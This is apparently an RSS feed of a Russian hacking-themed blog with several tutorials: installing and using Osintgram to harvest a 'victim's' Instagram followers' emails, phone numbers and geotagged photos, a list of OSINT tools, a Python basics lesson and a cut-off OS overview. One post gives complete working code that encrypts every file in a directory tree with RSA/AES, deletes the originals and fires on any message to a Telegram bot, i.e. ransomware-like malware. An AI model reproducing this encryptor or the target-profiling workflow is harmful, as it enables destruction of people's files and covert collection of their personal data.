<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@ibmasters</title><generator>teletype.in</generator><description><![CDATA[@ibmasters]]></description><link>https://teletype.in/@ibmasters?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/ibmasters?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/ibmasters?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Fri, 22 May 2026 18:53:15 GMT</pubDate><lastBuildDate>Fri, 22 May 2026 18:53:15 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@ibmasters/5tHNoFpkPAP</guid><link>https://teletype.in/@ibmasters/5tHNoFpkPAP?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/5tHNoFpkPAP?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Osintgram</title><pubDate>Fri, 12 Nov 2021 11:47:13 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>OSINT развивается семимильными шагами, так что лучшее, что мы можем сделать, это выбрать инструменты, которые лучше других справляются со своими функциями.]]></description><content:encoded><![CDATA[
  <p id="docs-internal-guid-6e74b088-7fff-fae6-eac8-b933adb04c68">OSINT развивается семимильными шагами, так что лучшее, что мы можем сделать, это выбрать инструменты, которые лучше других справляются со своими функциями.</p>
  <p id="ig6n">Сегодняшний наш гость - Osintgram. Мощный инструмент, который позволяет получить максимум информации из страницы пользователя в Instagram.</p>
  <figure id="ncsN" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <p id="4Dzx">Единственный недостаток инструмента - нужда в открытости страницы жертвы, или подписке на жертву. Впрочем, последнее достаточно легко обходится при определенной смекалке.</p>
  <p id="bkNT">Необходимые и желательные инструменты:</p>
  <ol id="8i2I">
    <li id="0yOj">На ПК должен быть установлен <u><em>Python</em></u>;</li>
    <li id="aGGY"><em><u>Pip</u></em> - как правило, устанавливается вместе с Python, однако, иногда требуется установить отдельно, подробнее тут <a href="https://pip.pypa.io/en/stable/installation/" target="_blank">https://pip.pypa.io/en/stable/installation/</a> ;</li>
    <li id="m6yV"><u><em>Git</em></u> - не принципиально, но достаточно важный инструмент;</li>
  </ol>
  <p id="M355">Остановимся на нем чуточку подробнее:</p>
  <p id="w6mB">Для Windows скачиваем установщик и просто идем по пунктам.</p>
  <p id="ITn5">Обладатели Linux скорее всего уже скачали его, но если нет, вот <a href="https://git-scm.com/download/linux" target="_blank">ссылка</a> для того, чтоб найти нужную команду под свой дистрибутив.</p>
  <p id="fYGu">Если пользуетесь Git то просто вводите команду:</p>
  <p id="Hwdk"><code>git clone https://github.com/Dragon-Hacking/Osintgram.git</code></p>
  <figure id="5Zyz" class="m_column">
    <img src="https://lh5.googleusercontent.com/JwfTQL4t_se4t9fwqloEuozF0ggPiTRVSj46PNK9L2rauQiszdOKlG8I1EudpUCOIrW_20Hf5Df2IDM9EWmm7f6fpULnKzL0eqhOaBSTKz1VWmtc8hyg-ag9SQ-JKVGlGjG0ILCb" width="504" />
  </figure>
  <p id="FyIQ">Если же нет:</p>
  <figure id="2DX1" class="m_column">
    <img src="https://lh3.googleusercontent.com/xPbXDucrJe_MtMLTQoCkDHPQNxTxgjYkmJdv1R4L7jNdEdPvZs4ZhYLFgW_Q5xT0TVx1xhOVNrI3xlIvwkVAtaeja5d9pffsQHqA8sZN35_B9joRtl7_acU946uyoGUUqM74SjmC" width="416" />
  </figure>
  <p id="Rbeu">Далее переходим в директорию Osintgram, и вводим команду:</p>
  <p id="i2gM"><code>python3 -m venv venv</code></p>
  <p id="vLY8">Она создает виртуальное окружение, позволяя установить нужные библиотеки (в т.ч. и нужной версии) не вызывая конфликтов с уже установленными библиотеками.</p>
  <blockquote id="bITT">Далее для большего удобства в Windows выполняйте команды в оболочке PowerShell.</blockquote>
  <p id="KhAQ">Дальше, нам нужно активировать виртуальное окружение используя команду:</p>
  <p id="P9Pf">Для Windows:</p>
  <p id="n2ku"><code>.\venv\Scripts\activate.ps1</code></p>
  <p id="SjL9">Linux:               </p>
  <p id="TcAh"><code>source venv/bin/activate</code></p>
  <p id="9WvE">В Windows может появиться ошибка, связанная с политикой запуска скриптов:</p>
  <figure id="k1Fa" class="m_column">
    <img src="https://lh5.googleusercontent.com/xxFv481vx4g_SBEhJ9rLalr0PiaYPzRYcVG-ijRLaMbDTYVpKDHuoPc569Em_ZNl9rCXgodFH5s3tNggQy8QzYfs-OZizAKd1CDLIP8tL2JUT4waI5aN-VKlPFYIsaYXuU6EiJZm" width="768" />
  </figure>
  <p id="nT78">Для ее исправления открываем PowerShell от имени администратора и вводим данную команду:</p>
  <p id="djLE"><code>Set-ExecutionPolicy RemoteSigned –Force</code></p>
  <p id="1D66">В дальнейшем может появляться вопрос про открытие, его просто надо будет подтвердить.</p>
  <p id="0XC6">Дальше, вне зависимости от системы, команда:</p>
  <p id="Tvox"><code>pip install -r requirements.txt</code></p>
  <p id="WDuF">Установит все необходимые модули.</p>
  <p id="BCO2">Идем в папку config и открываем файл credentials.ini блокнотом. Вводим данные от аккаунта, который имеется у вас.</p>
  <p id="mXgK">Для Linux - можно воспользоваться командой: </p>
  <p id="XsHT"><code>make setup</code></p>
  <p id="qb5D">Далее команда:</p>
  <p id="oBNO"><code>python3 main.py ник_цели</code></p>
  <p id="891S">Основные команды:</p>
  <p id="FJ7U"><code>- addrs</code> - получение адресов фотографий с геолокацией</p>
  <p id="M0Xj"><code>- captions</code> - получение подписей к фотографиям пользователя</p>
  <p id="8swv"><code>- followers</code> - получение подписчиков цели</p>
  <p id="hVme"><code>- followings</code> - получение подписок цели</p>
  <p id="tGdF"><code>- fwersemail</code> - получение имейл адресов цели</p>
  <p id="6qfY"><code>- fwingsemail</code> - электронная почта подписок цели</p>
  <p id="Ut2H"><code>- fwersnumber</code> - получение номеров телефонов подписчиков цели</p>
  <p id="P7UB"><code>- fwingsnumber</code> - получение номеров телефонов подписок цели</p>
  <p id="NpAr"><code>- info</code> - получение информации из профиля</p>
  <p id="H2Ip"><code>- photos</code> - загрузка фотографий цели</p>
  <p id="n7Da"><code>- propic</code> - загрузка аватарки цели</p>
  <p id="abcS"><code>- stories</code> - загрузка сторис цели</p>
  <p id="oyJL">Это показаны самые интересные команды, <a href="https://github.com/Dragon-Hacking/Osintgram/blob/development/doc/COMMANDS.md" target="_blank">ознакомиться</a> с ними подробнее.</p>
  <p id="iPZt"><strong>Помните, данный скрипт собирает <em>открытую</em> информацию, которую возможно найти и самому, однако экономит уйму времени. Оставайтесь с нами и узнавайте о других интересных инструментах OSINT</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/X8_KgKJDXCc</guid><link>https://teletype.in/@ibmasters/X8_KgKJDXCc?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/X8_KgKJDXCc?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Инструменты OSINT</title><pubDate>Tue, 09 Nov 2021 20:07:20 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>Для поиска необходимой информации в интернете существуют поисковые системы. Однако что делать, если нам нужно узнать больше информации, нежели предоставляют нам гугл или яндекс? Ответ на этот вопрос вы найдете в этой статье.]]></description><content:encoded><![CDATA[
  <p id="docs-internal-guid-18a40f1e-7fff-c91f-1d95-94cb1df8d887">Для поиска необходимой информации в интернете существуют поисковые системы. Однако что делать, если нам нужно узнать больше информации, нежели предоставляют нам гугл или яндекс? Ответ на этот вопрос вы найдете в этой статье.</p>
  <figure id="F6I9" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <h2 id="PPGX">Shodan</h2>
  <p id="WfzQ">В то время как Google используют для ответов на простейшие вопросы, <a href="https://www.shodan.io/" target="_blank">Shodan </a>дает возможность хакерам просматривать выставленные активы.</p>
  <p id="kInb">Сервис продемонстрирует вам выборку результатов, которые дадут более полное смысловое представление вашего запроса.</p>
  <p id="9rGR">Чаще всего системой пользуются для поиска активов, подключенных к сети.</p>
  <p id="WP2y">Инструмент имеет открытый исходный код, позволяет провести качественную аналитику по вопросам безопасности, проверить уязвимые места конкретной цели (открытость личных данных, доступной паролей и портов, айпишника и т. д.).</p>
  <p id="sH0t">Также Shodan обеспечивает наиболее адаптивный поиск по сообществам.</p>
  <h2 id="k6aL">Google Dorks</h2>
  <p id="VkPd">Сервис запущен в 2002 году, но признайтесь, слышали ли вы о нем?</p>
  <p id="26LN">Он демонстрирует замечательную производительность и является поистине интеллектуальным инструментом, который базируется на запросах.</p>
  <p id="llGm">Сервис имеет открытый исходный код, помогая пользователям быстро ориентироваться на результаты или индекс поиска.</p>
  <h2 id="rnJt">WebArchive</h2>
  <p id="xOgQ"><a href="https://web.archive.org/" target="_blank">Сайт</a>, который периодически делает снимки страниц интернета. Хотите увидеть как выглядел поисковик Google в самом начале? Пожалуйста. Хотите увидеть удаленные фотографии из соцсетей? Легко.</p>
  <h2 id="MiO8">Maltego</h2>
  <p id="COKY">Встроенный в Kali Linux <a href="https://www.maltego.com/" target="_blank">инструмент </a>от компании Paterva имеет открытый код и предназначен для проведения серьезных исследований цели с помощью преобразований.</p>
  <p id="Yqhw">Для использования потребуется бесплатная регистрация на сайте производителя, после чего можно переходить к созданию цифровых отпечатков выбранной цели в сети.</p>
  <p id="D2cy">Для полнофункционального доступа придется приобрести PRO версию, выложив 999 вечно зеленых, а также иметь API ключи от сервисов (часть которых также платные) для их интеграции и использования в программе.</p>
  <h2 id="1q9C">TheHarvester</h2>
  <p id="QLZH">Узконаправленный, но не менее полезный <a href="https://www.kali.org/tools/theharvester/" target="_blank">инструмент </a>для поиска поддоменов, электронной почты, айпишников и других полезностей из огромного массива общедоступной информации.</p>
  <h2 id="QwcV">Recon-Ng</h2>
  <p id="d9Bb"><a href="https://www.kali.org/tools/recon-ng/" target="_blank">Инструмент </a>для проведения полевой разведки с помощью модульного подхода. Пригодится пользователям, которые не понаслышке знакомы с Metasploit. Встроены модули, позволяющие получить информацию в соответствии с запросом и потребностями. Модули можно использовать, разметив домены в рабочем пространстве. Последние создаются для выполнения специальных операций, как, например, поиск доменов, связанных с первоначальным или целевых.</p>
  <h2 id="H8C7">SpiderFoot</h2>
  <p id="4ITD">Еще один полезный <a href="https://www.spiderfoot.net/" target="_blank">инструмент </a>разведки, имеет открытый код для Windows и Linux. Написан на базе языка Python, имеет очень удобную конфигурацию, отлично работает почти на любой платформе, встраивается в графические интерфейсы.</p>
  <h2 id="0YBx">Creepy</h2>
  <p id="ArO9">Специальный <a href="https://www.geocreepy.com/" target="_blank">инструмент </a>для проведения разведки геолокации, собирающий данные в основном из социальных сетей, хостингов публикации картинок и фотографий. По итогам работы сервис публикует отчеты на карте с помощью специального поискового фильтра. Отчеты можно скачать в формате CSV или KML, для того чтобы экспортировать в специальные аналитические программы.</p>
  <p id="6vKo"></p>
  <p id="mwOe"><strong>Здесь представлены далеко не все программы и скрипты, которые используются в OSINT. Также Вы всегда можете создать собственный инструмент для поиска информации. Подписывайтесь на канал и узнавайте больше об инструментах OSINT</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/RskCk6No8TQ</guid><link>https://teletype.in/@ibmasters/RskCk6No8TQ?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/RskCk6No8TQ?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Пишем простого бота для шифрования файлов в нужной нам директории.</title><pubDate>Fri, 05 Nov 2021 11:54:58 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>Данная статья является больше развлекательной, и не несет сильной информативной нагрузки, однако, кому-то может понадобиться. Мы будем использовать гибридное шифрование с помощью алгоритмов RSA и AES для шифровки и дешифровки данных из указанной директории.]]></description><content:encoded><![CDATA[
  <p id="a3v0">Данная статья является больше развлекательной, и не несет сильной информативной нагрузки, однако, кому-то может понадобиться. Мы будем использовать гибридное шифрование с помощью алгоритмов RSA и AES для шифровки и дешифровки данных из указанной директории.</p>
  <figure id="ayVl" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <p id="sxZC">Для начала, нам понадобится сгенерировать ключи. Сейчас применяя алгоритм RSA считается надежным ключ от 2048 бит. Напишем простенький скрипт для генерации и записи ключей:</p>
  <p id="78bu"><code>from Crypto.PublicKey import RSA <br />key = RSA.generate(2048) <br />private_key = key.export_key() <br />file_out = open(&quot;private.pem&quot;, &quot;wb&quot;) <br />file_out.write(private_key) <br />print(private_key) <br />public_key = key.public_key().export_key() <br />file_out = open(&quot;public.pem&quot;, &quot;wb&quot;) <br />file_out.write(public_key) <br />print(public_key)</code></p>
  <p id="NPrF">К слову, использовалась библиотека pycrypto, так что если захотите похимичить – не забудьте установить командой в терминале:</p>
  <p id="SRMW"><code>pip install pycrypto</code></p>
  <p id="lbcq">Запускаем выполнение через терминал, и видим подобное:</p>
  <figure id="cBhw" class="m_column">
    <img src="https://img3.teletype.in/files/ec/ab/ecabee6e-f444-4e72-aa60-82d3714ca363.png" width="1113" />
  </figure>
  <blockquote id="N6fj">!!!ВАЖНО!!! Я выложил в открытый доступ свой приватный ключ <em>только</em> потому, что кроме как для написания статьи я его <em>нигде</em> не использую. Следите за сохранностью вашего приватного ключа и помните, что в случае его утери вы <em>не сможете расшифровать</em> свои файлы</blockquote>
  <p id="onqU">Далее пишем сам код шифровальщика:</p>
  <p id="rwzn"><code>from Crypto.PublicKey import RSA <br />from Crypto.Random import get_random_bytes <br />from Crypto.Cipher import AES, PKCS1_OAEP <br />import os, sys <br /><br /><br />def crypt(file): <br />    f = open(file, &quot;rb&quot;) <br />    data = f.read(); <br />    f.close() <br />    file_out = open(str(file) + &quot;.bin&quot;, &quot;wb&quot;) <br />    recipient_key = RSA.import_key(open(&quot;public.pem&quot;).read()) <br />    session_key = get_random_bytes(16) <br />    cipher_rsa = PKCS1_OAEP.new(recipient_key) <br />    enc_session_key = cipher_rsa.encrypt(session_key) <br />    cipher_aes = AES.new(session_key, AES.MODE_EAX) <br />    ciphertext, tag = cipher_aes.encrypt_and_digest(data) <br />    [file_out.write(x) for x in (enc_session_key, cipher_aes.nonce, tag, ciphertext)] <br />    print(file + &quot; Encrypted&quot;) <br />    os.remove(file) <br /><br /><br />def walk(dir): <br />    for name in os.listdir(dir): <br />        path = os.path.join(dir, name) <br />        if os.path.isfile(path): <br />            crypt(path) <br />        else: <br />            walk(path) <br /><br />walk(&quot;../test_for_crypt&quot;)</code></p>
  <p id="tvgC">Немного обсудим этот код. Скрипт проходит по указанной папке, и шифрует все файлы, включая также файлы во вложенных директориях с помощью обычного сессионного ключа, который сгенерирован случайно. А затем сессионный ключ шифруется с помощью нашего публичного ключа.</p>
  <p id="Qda3">Данный код настолько прост и процедурно написан, что любой, даже начинающий человек, сможет разобраться и понять принцип его работы.</p>
  <p id="VFMq">Для пущей эффективности, возможно настроить это все на работу по какому-то триггеру. На комбинацию клавиш, или же через Telegram бота. Сделаем простейший бот на одну команду, даже без try\except конструкции.</p>
  <p id="3kpD">Установим PyTelegramBotApi и импортируем его в файл кода:</p>
  <p id="LsZ7"><code>import telebot <br />from telebot.types import Message</code></p>
  <p id="8qrE">Далее базово ставим конфигурацию бота, для наглядности вкинем это в тот же файл (однако лучше всегда делать отдельный конфигурационный файл):</p>
  <p id="rWqv"><code>TOKEN = &quot;Здесь должен быть токен вашего бота из BotFather&quot; <br />bot = telebot.TeleBot(TOKEN) <br />text = &quot;ALL FILE ENCRYPTED&quot;<br />dir = &quot;Ваша директория&quot;</code></p>
  <p id="uh5H">Оборачиваем функцию crypt и walk в конструкцию message handler, должно получится примерно так:</p>
  <p id="YkY1"><code>def crypt(file):<br />    #Наш код<br /><br /><br />def walk(dir):<br />    #Наш код<br /><br /><br />@bot.message_handler(func=lambda message: True) <br />def bot(message: Message): <br />    walk(dir)<br />    bot.reply_to(message, text)<br /><br /><br />bot.polling()</code></p>
  <p id="0jfW">Данный код будет срабатывать после отправки любого сообщения боту.</p>
  <p id="cc4E">Однако, вероятно, вы зададитесь вопросом, как же расшифровать наши данные? Ответом на этот вопрос служит следующий код:</p>
  <p id="agxM"><code>def decrypt(file):<br />    file_in = open(file, &quot;rb&quot;)<br />    file_out = open(str(file[:-4]), &quot;wb&quot;)<br />    private_key = RSA.import_key(open(&quot;private.pem&quot;).read())<br />    enc_session_key, nonce, tag, ciphertext = \<br />        [file_in.read(x) for x in (private_key.size_in_bytes(), 16, 16, -1)]<br />    cipher_rsa = PKCS1_OAEP.new(private_key)<br />    session_key = cipher_rsa.decrypt(enc_session_key)<br />    cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)<br />    data = cipher_aes.decrypt_and_verify(ciphertext, tag)<br />    file_out.write(data)<br />    print(file + &quot; DECRYPTED&quot;)<br />    os.remove(file)<br /><br />def walk_decrypt(dir):<br />    for name in os.listdir(dir):<br />        path = os.path.join(dir, name)<br />        if os.path.isfile(path):<br />            decrypt(path)<br />        else:<br />            walk_decrypt(path)<br /><br />walk_decrypt(&quot;../test_for_crypt&quot;)</code></p>
  <p id="RhnT">По сути все то же самое, но вместо шифрования - дешифровка.</p>
  <p id="iYtx"><strong>Это был наш первый небольшой проект на питоне, дальше будет только интереснее. Подписывайтесь на канал, чтобы не пропустить другие, более интересные проекты</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/z3B-R-PyCt2</guid><link>https://teletype.in/@ibmasters/z3B-R-PyCt2?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/z3B-R-PyCt2?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Основы языка Python</title><pubDate>Wed, 03 Nov 2021 11:05:55 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>Сегодня мы расскажем о том, как начать работать с языком программирования Python, о его установке, синтаксисе и особенностях, а также вы напишите свой первый код, следуя руководству из нашей статьи.]]></description><content:encoded><![CDATA[
  <p id="C2X6">Сегодня мы расскажем о том, как начать работать с языком программирования Python, о его установке, синтаксисе и особенностях, а также вы напишите свой первый код, следуя руководству из нашей статьи.</p>
  <figure id="w7yX" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <h2 id="me5Q">Установка Python</h2>
  <p id="krR5">В первую очередь нам необходимо установить Python, загрузив установочный пакет с официального <a href="http://python.org" target="_blank">сайта.</a> Все дальнейшие действия указаны для ОС Windows, гайды по установке на MacOS и Linux вы можете найти в интернете. </p>
  <p id="q6zC">Итак, чтобы загрузить установочный пакет, выполняем следующие действия:</p>
  <ol id="SRQJ">
    <li id="g5Ko">Открываем окно браузера и переходим на страницу <a href="https://www.python.org/downloads/windows/" target="_blank">Download</a> для Windows.</li>
    <li id="eJo6">Под верхним заголовком, где написано <strong>Python Releases for Windows</strong>, нажимаем на ссылку к последней версии Python 3.x.x.;</li>
    <li id="X9kw">Листаем вниз и выбираем установочный файл Windows x86-64 для 64-разрядной версии операционной системы или файл Windows x86 для 32-разрядной (Смотреть ниже).</li>
  </ol>
  <p id="PV4A">В Windows вы можете выбрать как 32-битный, так и 64-битный установочный файл. Рассмотрим, в чем разница между ними:</p>
  <ul id="T3ng">
    <li id="FaNL">Если у вас система с 32-битным процессором, тогда вам нужно выбирать 32-битный установочный файл.</li>
    <li id="MCoJ">Для <a href="https://teletype.in/@ibmasters/DDlwg_ivUQE" target="_blank">64-битных систем</a>, каждый установочный файл может работать в большинстве случаев. 32-битная версия использует меньше памяти, однако 64-битная версия работает лучше для приложений с интенсивными вычислениями.</li>
    <li id="ksBF">Если вы не уверенны в том, какую версию выбрать, выбирайте 64-битную.</li>
  </ul>
  <p id="o4Lp">После загрузки установочного пакета нам необходимо активировать его и установить Python. Для этого откройте скачанный файл и следуйте инструкциям в открывшемся окошке (рекомендуем выбирать пукнт &quot;Install Now&quot;). Обратите внимание на то, чтобы у вас стояла галочка напротив надписи &quot;Add Python 3.x to PATH&quot;:</p>
  <figure id="ataK" class="m_column">
    <img src="https://img4.teletype.in/files/b6/85/b685cb84-0398-4433-804d-42acedb3e753.jpeg" width="1060" />
  </figure>
  <p id="IBYU">Спустя пару минут у вас на компьютере появится готовый к работе Python. Однако, это еще не все. Нам необходимо установить среду разработки PyCharm - удобный и функциональный инструмент. </p>
  <h2 id="VvSh">Установка PyCharm</h2>
  <ul id="HZFo">
    <li id="lLhh">Перейдите на сайт <a href="https://www.jetbrains.com/pycharm/" target="_blank">JetBrains</a>.</li>
    <li id="DOBS">Нажмите «Download». Произойдет перенаправление на страницу загрузки PyCharm.</li>
  </ul>
  <figure id="6laG" class="m_column">
    <img src="https://img3.teletype.in/files/e9/64/e96494de-0cf8-4083-bfb5-99f4abef9cc3.png" width="1897" />
  </figure>
  <ul id="E62L">
    <li id="G4UO">Дальше необходимо выбрать версию PyCharm: <strong>Community</strong> или <strong>Professional</strong>. Professional — это платная версия с полным набором функций. Она идеально подходит для профессиональной разработки. Community бесплатная. Ею можно пользоваться благодаря набору базовых возможностей. После нажатия на кнопку «Загрузить» скачивание начнется автоматически.</li>
  </ul>
  <figure id="4SeI" class="m_column">
    <img src="https://img2.teletype.in/files/d0/e8/d0e8e80b-ec45-4d37-a2d3-25760a356b18.png" width="1898" />
  </figure>
  <ul id="3IL9">
    <li id="DODf">Теперь необходимо запустить установку (~ pycharm-community-2019.2). Нажмите «Next».</li>
    <li id="YKDQ">Оставьте папку установки по умолчанию. Это папка <code>C:\Program files(x86)\JetBrains\PyCharm Community Edition 2019.2</code>. Если выбрана другая, лучше указать именно это направление. Нажмите «Next».</li>
    <li id="yQPR">Поставьте галочки напротив обоих пунктов, если нужен ярлык для рабочего стола. Нажмите «Next».</li>
  </ul>
  <figure id="dsfa" class="m_column">
    <img src="https://pythonru.com/wp-content/uploads/2019/11/opcii-ustanovki-pycharm.png" width="512" />
  </figure>
  <ul id="ouCI">
    <li id="e3kE">Далее установщик попросит указать имя для отображения в стартовом меню. По умолчанию это JetBrains. Нажмите «Install».</li>
    <li id="FXGl">Установка начнется автоматически. Дождитесь завершения.</li>
    <li id="gY0j">После завершения установки поставьте галочку напротив «Run PyCharm Community Edition» для запуска, а затем «Finish».</li>
    <li id="MuQ1">Если вы только учите язык Python и установили PyCharm впервые, тогда выберите пункт «I do not have a previous version of PyCharm or I do not want to import my settings» и «ОК».</li>
    <li id="cMC5">PyCharm запустится. Первый раз этой займет больше времени.</li>
    <li id="B2qN">После приветственного окна нажмите «Create New Project».</li>
    <li id="AczV">Выберите директорию для сохранения проекта. Во втором поле нужно указать местоположение интерпретатора Python (который уже должен быть установлен). Обычно PyCharm находит его самостоятельно. Если не удалось, нужно указать путь к нему и нажать «Create».</li>
    <li id="iQJP">Нажмите «File &gt; New &gt; Python File». Введите название нового файла. Он откроется с чистой консолью. Можно начинать писать программу для проверки. Напишите что-то простое: например, программу, которая выводит «Hello World!» на экран. Используйте этот код, чтобы проверить работу PyCharm:</li>
  </ul>
  <p id="N6Pp"><code>print(&quot;Hello World!&quot;) </code></p>
  <p id="H7P0">В любом месте кликните правой кнопкой мыши и выберите «Run». Программа выполнится, а вывод будет показан на экране. Это значит, что PyCharm установлен и готов к работе.</p>
  <h2 id="YGs0">Особенности и синтаксис Python</h2>
  <p id="5JgD">Начнем с того, что питон не требует явного объявления переменных, то есть нам не нужно отдельно &quot;говорить&quot; программе, что переменная number будет целочисленной, а переменная string - текстовой, достаточно просто присвоить переменной соответствующее значение с помощью знака равно (=):</p>
  <p id="Zsgz"><code>number = 5<br />string = &#x27;string&#x27;</code></p>
  <p id="gyqN">Второй особенностью является регистрозависимость. То есть переменные var и Var будут иметь разные значения.</p>
  <p id="7UAx">Третья особенность заключается в отсутствии операторных скобок (например, {...} в C или begin ... end в Pascal). Вместо них используются отступы (пробелы или табуляция), а вход в следующий блок осуществляется с помощью двоеточия, например:</p>
  <p id="8eIK"><code>if True:</code></p>
  <p id="N4C0"><code>    print(&#x27;hello&#x27;)</code></p>
  <p id="gbrR">Чтобы присвоить значение пременной используется знак «=», а для сравнения — <br /> «==». Для увеличения значения переменной, или добавления к строке используется оператор «+=», а для уменьшения — «-=». Все эти операции могут взаимодействовать с большинством типов, в том числе со строками. Например:</p>
  <p id="fsR2"><code>myvar = 3<br />print(myvar)<br />myvar += 2<br />print(myvar)<br />myvar -= 1<br />print(myvar)<br />mystring = «Hello»<br />mystring += &quot; world.&quot;<br />print(mystring)<br />myvar, mystring = mystring, myvar<br />print(myvar, mystring)</code></p>
  <h2 id="0FCh">Первый код</h2>
  <p id="Dzxo">Для примера нашего первого кода давайте возьмем калькулятор ИМТ. Формула ИМТ выглядит следующим образом:</p>
  <blockquote id="99Uj">ИМТ = Вес/(Рост * Рост)</blockquote>
  <p id="QpeP">Соответственно, нам нужно принимать одно целочисленное значение и одно десятичное: вес в килограммах и рост в метрах. Для этого мы будем использовать фукнцию input в связке с функциями int и float. Выглядеть это будет следующим образом:</p>
  <p id="Icm5"><code>w = int(input(&#x27;Введите свой вес в килограммах: &#x27;))<br />h = float(input(&#x27;Введите свой рост в метрах: &#x27;))</code></p>
  <p id="r5Jh">В данном случае функции input принимают в качестве аргументов строки, которые будут выведены в консоли при запуске программы.</p>
  <p id="q1vO">Теперь нам надо обработать полученные данные с помощью нашей формулы:</p>
  <p id="Ehef"><code>imt = w/(h * h)</code></p>
  <p id="xepB">И вывести результат на экран:</p>
  <p id="27Ot"><code>print(&#x27;Ваш ИМТ равен&#x27;, imt)</code></p>
  <figure id="u4Ph" class="m_original">
    <img src="https://img4.teletype.in/files/f8/cc/f8cc84aa-4cf5-4432-9c92-fd8065ffcc03.png" width="371" />
  </figure>
  <p id="CVWs"><strong>Это были ваши первые шаги в познании языка Python. Согласитесь, это было довольно просто, однако дальше будет сложнее и интереснее: мы создадим своего телеграмм бота, биржевого помощника и даже свой клиент телеграмма. Оставайся с нами и не пропусти эти проекты</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/DDlwg_ivUQE</guid><link>https://teletype.in/@ibmasters/DDlwg_ivUQE?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/DDlwg_ivUQE?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Обзор операционных систем</title><pubDate>Sat, 30 Oct 2021 12:42:41 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>Какую операционную систему выбрать? Этим вопросом задаются многие при покупке нового компьютера или ноутбука. Поэтому предлагаем ознакомиться с нашим обзором различных ОС, проливающим свет на особенности каждой. ]]></description><content:encoded><![CDATA[
  <p id="o9rC">Какую операционную систему выбрать? Этим вопросом задаются многие при покупке нового компьютера или ноутбука. Поэтому предлагаем ознакомиться с нашим обзором различных ОС, проливающим свет на особенности каждой. </p>
  <figure id="lH1x" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <p id="WIqj">На данный момент, в мире распространены Windows, MacOS, и семейство операционных систем GNU/Linux. Каждая из них заняла свое место на части аппаратных устройств. Наиболее широко известными являются Windows и MacOS, находящиеся постоянно на слуху. В подтверждение этому мы можем увидеть статистику:</p>
  <figure id="YrtH" class="m_column">
    <img src="https://img1.teletype.in/files/c9/2f/c92f2cde-1ceb-4a48-b779-c0466be75a3a.png" width="553" />
  </figure>
